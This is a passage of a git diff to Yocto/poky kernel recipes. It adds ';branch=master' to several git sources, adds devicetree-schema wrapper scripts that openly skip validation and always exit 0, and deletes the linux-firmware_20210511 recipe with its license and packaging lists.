"git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \ " SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b" diff --git a/poky/meta/recipes-kernel/dtc/dtc.inc b/poky/meta/recipes-kernel/dtc/dtc.inc index 5da6c24fbf..461ab8fbd3 100644 --- a/poky/meta/recipes-kernel/dtc/dtc.inc +++ b/poky/meta/recipes-kernel/dtc/dtc.inc @@ -5,7 +5,7 @@ SECTION = "bootloader" LICENSE = "GPLv2 | BSD" DEPENDS = "flex-native bison-native" -SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \ file://make_install.patch \ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \ " diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate new file mode 100644 index 0000000000..2aa57851c7 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-doc-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-doc-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema new file mode 100644 index 0000000000..24b89d8619 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-mk-schema wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-mk-schema.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate new file mode 100644 index 0000000000..8a4710a7ed --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate @@ -0,0 +1,20 @@ +#!/bin/sh +# dt-validate wrapper to allow kernel dt-validation to pass +# +# Copyright (C) 2021 Bruce Ashfield +# License: MIT (see COPYING.MIT at the root of the repository for terms) + +for arg; do + case "$arg" in + --version) + echo "v2021.10" + ;; + esac +done + +# TBD: left for future consideration +# exec dt-validate.real "$@" + +# we always succeed +exit 0 + diff --git a/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb new file mode 100644 index 0000000000..c869274d09 --- /dev/null +++ b/poky/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb @@ -0,0 +1,17 @@ +DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema" +HOMEPAGE = "https://yoctoproject.org" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420" + +SRC_URI = "file://dt-doc-validate \ + file://dt-mk-schema \ + file://dt-validate" + +do_install() { + install -d ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/ + install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/ +} + +BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb index 3f76af424b..82d678e509 100644 --- a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb +++ b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb @@ -14,7 +14,7 @@ PV = "0.2+git${SRCPV}" inherit native -SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git" +SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-kernel/kmod/kmod.inc b/poky/meta/recipes-kernel/kmod/kmod.inc index bb678c6900..631b50658a 100644 --- a/poky/meta/recipes-kernel/kmod/kmod.inc +++ b/poky/meta/recipes-kernel/kmod/kmod.inc @@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f" # Lookout for PV bump too when SRCREV is changed PV = "26" -SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \ file://depmod-search.conf \ file://0001-build-Stop-using-dolt.patch \ file://avoid_parallel_tests.patch \ diff --git a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb deleted file mode 100644 index 513932984e..0000000000 --- a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb +++ /dev/null @@ -1,1067 +0,0 @@ -SUMMARY = "Firmware files for use with Linux kernel" -HOMEPAGE = "https://www.kernel.org/" -DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \ -that contains firmware binary blobs necessary for partial or full functionality \ -of certain hardware devices." -SECTION = "kernel" - -LICENSE = "\ - Firmware-Abilis \ - & Firmware-adsp_sst \ - & Firmware-agere \ - & Firmware-amdgpu \ - & Firmware-amd-ucode \ - & Firmware-amlogic_vdec \ - & Firmware-atheros_firmware \ - & Firmware-atmel \ - & Firmware-broadcom_bcm43xx \ - & Firmware-ca0132 \ - & Firmware-cavium \ - & Firmware-chelsio_firmware \ - & Firmware-cw1200 \ - & Firmware-cypress \ - & Firmware-dib0700 \ - & Firmware-e100 \ - & Firmware-ene_firmware \ - & Firmware-fw_sst_0f28 \ - & Firmware-go7007 \ - & Firmware-GPLv2 \ - & Firmware-hfi1_firmware \ - & Firmware-i2400m \ - & Firmware-i915 \ - & Firmware-ibt_firmware \ - & Firmware-ice \ - & Firmware-it913x \ - & Firmware-iwlwifi_firmware \ - & Firmware-IntcSST2 \ - & Firmware-kaweth \ - & Firmware-Lontium \ - & Firmware-Marvell \ - & Firmware-moxa \ - & Firmware-myri10ge_firmware \ - & Firmware-netronome \ - & Firmware-nvidia \ - & Firmware-OLPC \ - & Firmware-ath9k-htc \ - & Firmware-phanfw \ - & Firmware-qat \ - & Firmware-qcom \ - & Firmware-qla1280 \ - & Firmware-qla2xxx \ - & Firmware-qualcommAthos_ar3k \ - & Firmware-qualcommAthos_ath10k \ - & Firmware-r8a779x_usb3 \ - & Firmware-radeon \ - & Firmware-ralink_a_mediatek_company_firmware \ - & Firmware-ralink-firmware \ - & Firmware-rtlwifi_firmware \ - & Firmware-imx-sdma_firmware \ - & Firmware-siano \ - & Firmware-tda7706-firmware \ - & Firmware-ti-connectivity \ - & Firmware-ti-keystone \ - & Firmware-ueagle-atm4-firmware \ - & Firmware-via_vt6656 \ - & Firmware-wl1251 \ - & Firmware-xc4000 \ - & Firmware-xc5000 \ - & Firmware-xc5000c \ - & WHENCE \ -" - -LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ - file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \ - file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \ - file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \ - file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \ - file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \ - file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \ - file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \ - file://LICENCE.broadcom_bcm43xx;md5=3160c14df7228891b868060e1951dfbc \ - file://LICENCE.ca0132;md5=209b33e66ee5be0461f13d31da392198 \ - file://LICENCE.cadence;md5=009f46816f6956cfb75ede13d3e1cee0 \ - file://LICENCE.cavium;md5=c37aaffb1ebe5939b2580d073a95daea \ - file://LICENCE.chelsio_firmware;md5=819aa8c3fa453f1b258ed8d168a9d903 \ - file://LICENCE.cw1200;md5=f0f770864e7a8444a5c5aa9d12a3a7ed \ - file://LICENCE.cypress;md5=48cd9436c763bf873961f9ed7b5c147b \ - file://LICENSE.dib0700;md5=f7411825c8a555a1a3e5eab9ca773431 \ - file://LICENCE.e100;md5=ec0f84136766df159a3ae6d02acdf5a8 \ - file://LICENCE.ene_firmware;md5=ed67f0f62f8f798130c296720b7d3921 \ - file://LICENCE.fw_sst_0f28;md5=6353931c988ad52818ae733ac61cd293 \ - file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \ - file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ - file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \ - file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \ - file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \ - file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \ - file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ - file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ - file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ - file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \ - file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ - file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ - file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ - file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \ - file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \ - file://LICENCE.myri10ge_firmware;md5=42e32fb89f6b959ca222e25ac8df8fed \ - file://LICENCE.Netronome;md5=4add08f2577086d44447996503cddf5f \ - file://LICENCE.nvidia;md5=4428a922ed3ba2ceec95f076a488ce07 \ - file://LICENCE.NXP;md5=58bb8ba632cd729b9ba6183bc6aed36f \ - file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \ - file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \ - file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \ - file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ - file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \ - file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \ - file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \ - file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \ - file://LICENSE.QualcommAtheros_ath10k;md5=cb42b686ee5f5cb890275e4321db60a8 \ - file://LICENCE.r8a779x_usb3;md5=4c1671656153025d7076105a5da7e498 \ - file://LICENSE.radeon;md5=68ec28bacb3613200bca44f404c69b16 \ - file://LICENCE.ralink_a_mediatek_company_firmware;md5=728f1a85fd53fd67fa8d7afb080bc435 \ - file://LICENCE.ralink-firmware.txt;md5=ab2c269277c45476fb449673911a2dfd \ - file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \ - file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \ - file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \ - file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \ - file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \ - file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \ - file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \ - file://LICENCE.via_vt6656;md5=e4159694cba42d4377a912e78a6e850f \ - file://LICENCE.wl1251;md5=ad3f81922bb9e197014bb187289d3b5b \ - file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ - file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ - file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ - file://WHENCE;md5=727d0d4e2d420f41d89d098f6322e779 \ - " - -# These are not common licenses, set NO_GENERIC_LICENSE for them -# so that the license files will be copied from fetched source -NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENCE.Abilis" -NO_GENERIC_LICENSE[Firmware-adsp_sst] = "LICENCE.adsp_sst" -NO_GENERIC_LICENSE[Firmware-agere] = "LICENCE.agere" -NO_GENERIC_LICENSE[Firmware-amdgpu] = "LICENSE.amdgpu" -NO_GENERIC_LICENSE[Firmware-amd-ucode] = "LICENSE.amd-ucode" -NO_GENERIC_LICENSE[Firmware-amlogic_vdec] = "LICENSE.amlogic_vdec" -NO_GENERIC_LICENSE[Firmware-atheros_firmware] = "LICENCE.atheros_firmware" -NO_GENERIC_LICENSE[Firmware-atmel] = "LICENSE.atmel" -NO_GENERIC_LICENSE[Firmware-broadcom_bcm43xx] = "LICENCE.broadcom_bcm43xx" -NO_GENERIC_LICENSE[Firmware-ca0132] = "LICENCE.ca0132" -NO_GENERIC_LICENSE[Firmware-cadence] = "LICENCE.cadence" -NO_GENERIC_LICENSE[Firmware-cavium] = "LICENCE.cavium" -NO_GENERIC_LICENSE[Firmware-chelsio_firmware] = "LICENCE.chelsio_firmware" -NO_GENERIC_LICENSE[Firmware-cw1200] = "LICENCE.cw1200" -NO_GENERIC_LICENSE[Firmware-cypress] = "LICENCE.cypress" -NO_GENERIC_LICENSE[Firmware-dib0700] = "LICENSE.dib0700" -NO_GENERIC_LICENSE[Firmware-e100] = "LICENCE.e100" -NO_GENERIC_LICENSE[Firmware-ene_firmware] = "LICENCE.ene_firmware" -NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28" -NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007" -NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2" -NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware" -NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m" -NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915" -NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware" -NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice" -NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2" -NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x" -NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware" -NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth" -NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium" -NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell" -NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek" -NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa" -NO_GENERIC_LICENSE[Firmware-myri10ge_firmware] = "LICENCE.myri10ge_firmware" -NO_GENERIC_LICENSE[Firmware-netronome] = "LICENCE.Netronome" -NO_GENERIC_LICENSE[Firmware-nvidia] = "LICENCE.nvidia" -NO_GENERIC_LICENSE[Firmware-OLPC] = "LICENCE.OLPC" -NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware" -NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw" -NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware" -NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom" -NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280" -NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx" -NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k" -NO_GENERIC_LICENSE[Firmware-qualcommAthos_ath10k] = "LICENSE.QualcommAtheros_ath10k" -NO_GENERIC_LICENSE[Firmware-r8a779x_usb3] = "LICENCE.r8a779x_usb3" -NO_GENERIC_LICENSE[Firmware-radeon] = "LICENSE.radeon" -NO_GENERIC_LICENSE[Firmware-ralink_a_mediatek_company_firmware] = "LICENCE.ralink_a_mediatek_company_firmware" -NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt" -NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt" -NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano" -NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware" -NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt" -NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity" -NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone" -NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware" -NO_GENERIC_LICENSE[Firmware-via_vt6656] = "LICENCE.via_vt6656" -NO_GENERIC_LICENSE[Firmware-wl1251] = "LICENCE.wl1251" -NO_GENERIC_LICENSE[Firmware-xc4000] = "LICENCE.xc4000" -NO_GENERIC_LICENSE[Firmware-xc5000] = "LICENCE.xc5000" -NO_GENERIC_LICENSE[Firmware-xc5000c] = "LICENCE.xc5000c" -NO_GENERIC_LICENSE[WHENCE] = "WHENCE" - -PE = "1" - -SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" - -SRC_URI[sha256sum] = "2aa6ae8b9808408f9811ac38f00c188e53e984a2b3990254f6c9c02c1ab13417" - -inherit allarch - -CLEANBROKEN = "1" - -do_compile() { - : -} - -do_install() { - oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install - cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/ -} - - -PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ - ${PN}-mt7601u-license ${PN}-mt7601u \ - ${PN}-radeon-license ${PN}-radeon \ - ${PN}-marvell-license ${PN}-pcie8897 ${PN}-pcie8997 \ - ${PN}-sd8686 ${PN}-sd8688 ${PN}-sd8787 ${PN}-sd8797 ${PN}-sd8801 \ - ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \ - ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \ - ${PN}-vt6656-license ${PN}-vt6656 \ - ${PN}-rs9113 ${PN}-rs9116 \ - ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \ - ${PN}-rtl8168 \ - ${PN}-cypress-license \ - ${PN}-broadcom-license \ - ${PN}-bcm-0bb4-0306 \ - ${PN}-bcm43143 \ - ${PN}-bcm43236b \ - ${PN}-bcm43241b0 \ - ${PN}-bcm43241b4 \ - ${PN}-bcm43241b5 \ - ${PN}-bcm43242a \ - ${PN}-bcm4329 \ - ${PN}-bcm4329-fullmac \ - ${PN}-bcm4330 \ - ${PN}-bcm4334 \ - ${PN}-bcm43340 \ - ${PN}-bcm4335 \ - ${PN}-bcm43362 \ - ${PN}-bcm4339 \ - ${PN}-bcm43430 \ - ${PN}-bcm43430a0 \ - ${PN}-bcm43455 \ - ${PN}-bcm4350 \ - ${PN}-bcm4350c2 \ - ${PN}-bcm4354 \ - ${PN}-bcm4356 \ - ${PN}-bcm4356-pcie \ - ${PN}-bcm43569 \ - ${PN}-bcm43570 \ - ${PN}-bcm4358 \ - ${PN}-bcm43602 \ - ${PN}-bcm4366b \ - ${PN}-bcm4366c \ - ${PN}-bcm4371 \ - ${PN}-bcm4373 \ - ${PN}-bcm43xx \ - ${PN}-bcm43xx-hdr \ - ${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \ - ${PN}-gplv2-license ${PN}-carl9170 \ - ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \ - \ - ${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \ - \ - ${PN}-iwlwifi-license ${PN}-iwlwifi \ - ${PN}-iwlwifi-135-6 \ - ${PN}-iwlwifi-3160-7 ${PN}-iwlwifi-3160-8 ${PN}-iwlwifi-3160-9 \ - ${PN}-iwlwifi-3160-10 ${PN}-iwlwifi-3160-12 ${PN}-iwlwifi-3160-13 \ - ${PN}-iwlwifi-3160-16 ${PN}-iwlwifi-3160-17 \ - ${PN}-iwlwifi-6000-4 ${PN}-iwlwifi-6000g2a-5 ${PN}-iwlwifi-6000g2a-6 \ - ${PN}-iwlwifi-6000g2b-5 ${PN}-iwlwifi-6000g2b-6 \ - ${PN}-iwlwifi-6050-4 ${PN}-iwlwifi-6050-5 \ - ${PN}-iwlwifi-7260 \ - ${PN}-iwlwifi-7265 \ - ${PN}-iwlwifi-7265d ${PN}-iwlwifi-8000c ${PN}-iwlwifi-8265 \ - ${PN}-iwlwifi-9000 \ - ${PN}-iwlwifi-misc \ - ${PN}-ibt-license ${PN}-ibt \ - ${PN}-ibt-11-5 ${PN}-ibt-12-16 ${PN}-ibt-hw-37-7 ${PN}-ibt-hw-37-8 \ - ${PN}-ibt-17 \ - ${PN}-ibt-20 \ - ${PN}-ibt-misc \ - ${PN}-i915-license ${PN}-i915 \ - ${PN}-ice-license ${PN}-ice \ - ${PN}-adsp-sst-license ${PN}-adsp-sst \ - ${PN}-bnx2-mips \ - ${PN}-liquidio \ - ${PN}-nvidia-license \ - ${PN}-nvidia-tegra-k1 ${PN}-nvidia-tegra \ - ${PN}-nvidia-gpu \ - ${PN}-netronome-license ${PN}-netronome \ - ${PN}-qat ${PN}-qat-license \ - ${PN}-qcom-license \ - ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \ - ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \ - ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 \ - ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \ - ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \ - ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \ - ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \ - ${PN}-lt9611uxc ${PN}-lontium-license \ - ${PN}-whence-license \ - ${PN}-license \ - " - -# For atheros -LICENSE_${PN}-ar9170 = "Firmware-atheros_firmware" -LICENSE_${PN}-ath6k = "Firmware-atheros_firmware" -LICENSE_${PN}-ath9k = "Firmware-atheros_firmware" -LICENSE_${PN}-atheros-license = "Firmware-atheros_firmware" - -FILES_${PN}-atheros-license = "${nonarch_base_libdir}/firmware/LICENCE.atheros_firmware" -FILES_${PN}-ar9170 = " \ - ${nonarch_base_libdir}/firmware/ar9170*.fw \ -" -FILES_${PN}-ath6k = " \ - ${nonarch_base_libdir}/firmware/ath6k \ -" -FILES_${PN}-ath9k = " \ - ${nonarch_base_libdir}/firmware/ar9271.fw \ - ${nonarch_base_libdir}/firmware/ar7010*.fw \ - ${nonarch_base_libdir}/firmware/htc_9271.fw \ - ${nonarch_base_libdir}/firmware/htc_7010.fw \ - ${nonarch_base_libdir}/firmware/ath9k_htc/htc_7010-1.4.0.fw \ - ${nonarch_base_libdir}/firmware/ath9k_htc/htc_9271-1.4.0.fw \ -" - -RDEPENDS_${PN}-ar9170 += "${PN}-atheros-license" -RDEPENDS_${PN}-ath6k += "${PN}-atheros-license" -RDEPENDS_${PN}-ath9k += "${PN}-atheros-license" - -# For carl9170 -LICENSE_${PN}-carl9170 = "Firmware-GPLv2" -LICENSE_${PN}-gplv2-license = "Firmware-GPLv2" - -FILES_${PN}-gplv2-license = "${nonarch_base_libdir}/firmware/GPL-2" -FILES_${PN}-carl9170 = " \ - ${nonarch_base_libdir}/firmware/carl9170*.fw \ -" - -RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license" - -# For QualCommAthos -LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k" -LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k" -LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k" -LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k" -LICENSE_${PN}-qca = "Firmware-qualcommAthos_ath10k" - -FILES_${PN}-ar3k-license = "${nonarch_base_libdir}/firmware/LICENSE.QualcommAtheros_ar3k" -FILES_${PN}-ar3k = " \ - ${nonarch_base_libdir}/firmware/ar3k \ -" - -FILES_${PN}-ath10k-license = "${nonarch_base_libdir}/firmware/LICENSE.QualcommAtheros_ath10k" -FILES_${PN}-ath10k = " \ - ${nonarch_base_libdir}/firmware/ath10k \ -" - -FILES_${PN}-ath11k = " \ - ${nonarch_base_libdir}/firmware/ath11k \ -" - -FILES_${PN}-qca = " \ - ${nonarch_base_libdir}/firmware/qca \ -" - -RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license" -RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license" -RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license" -RDEPENDS_${PN}-qca += "${PN}-ath10k-license" - -# For ralink -LICENSE_${PN}-ralink = "Firmware-ralink-firmware" -LICENSE_${PN}-ralink-license = "Firmware-ralink-firmware" - -FILES_${PN}-ralink-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink-firmware.txt" -FILES_${PN}-ralink = " \ - ${nonarch_base_libdir}/firmware/rt*.bin \ -" - -RDEPENDS_${PN}-ralink += "${PN}-ralink-license" - -# For mediatek MT7601U -LICENSE_${PN}-mt7601u = "Firmware-ralink_a_mediatek_company_firmware" -LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware" - -FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware" -FILES_${PN}-mt7601u = " \ - ${nonarch_base_libdir}/firmware/mt7601u.bin \ -" - -RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license" - -# For radeon -LICENSE_${PN}-radeon = "Firmware-radeon" -LICENSE_${PN}-radeon-license = "Firmware-radeon" - -FILES_${PN}-radeon-license = "${nonarch_base_libdir}/firmware/LICENSE.radeon" -FILES_${PN}-radeon = " \ - ${nonarch_base_libdir}/firmware/radeon \ -" - -RDEPENDS_${PN}-radeon += "${PN}-radeon-license" - -# For lontium -LICENSE_${PN}-lt9611uxc = "Firmware-Lontium" - -FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium" -FILES_${PN}-lt9611uxc = "${nonarch_base_libdir}/firmware/lt9611uxc_fw.bin" - -# For marvell -LICENSE_${PN}-pcie8897 = "Firmware-Marvell" -LICENSE_${PN}-pcie8997 = "Firmware-Marvell" -LICENSE_${PN}-sd8686 = "Firmware-Marvell" -LICENSE_${PN}-sd8688 = "Firmware-Marvell" -LICENSE_${PN}-sd8787 = "Firmware-Marvell" -LICENSE_${PN}-sd8797 = "Firmware-Marvell" -LICENSE_${PN}-sd8801 = "Firmware-Marvell" -LICENSE_${PN}-sd8887 = "Firmware-Marvell" -LICENSE_${PN}-sd8897 = "Firmware-Marvell" -LICENSE_${PN}-sd8997 = "Firmware-Marvell" -LICENSE_${PN}-usb8997 = "Firmware-Marvell" -LICENSE_${PN}-marvell-license = "Firmware-Marvell" - -FILES_${PN}-marvell-license = "${nonarch_base_libdir}/firmware/LICENCE.Marvell" -FILES_${PN}-pcie8897 = " \ - ${nonarch_base_libdir}/firmware/mrvl/pcie8897_uapsta.bin \ -" -FILES_${PN}-pcie8997 = " \ - ${nonarch_base_libdir}/firmware/mrvl/pcie8997_wlan_v4.bin \ - ${nonarch_base_libdir}/firmware/mrvl/pcieuart8997_combo_v4.bin \ - ${nonarch_base_libdir}/firmware/mrvl/pcieusb8997_combo_v4.bin \ -" -FILES_${PN}-sd8686 = " \ - ${nonarch_base_libdir}/firmware/libertas/sd8686_v9* \ - ${nonarch_base_libdir}/firmware/sd8686* \ -" -FILES_${PN}-sd8688 = " \ - ${nonarch_base_libdir}/firmware/libertas/sd8688* \ - ${nonarch_base_libdir}/firmware/mrvl/sd8688* \ -" -FILES_${PN}-sd8787 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8787_uapsta.bin \ -" -FILES_${PN}-sd8797 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8797_uapsta.bin \ -" -FILES_${PN}-sd8801 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8801_uapsta.bin \ -" 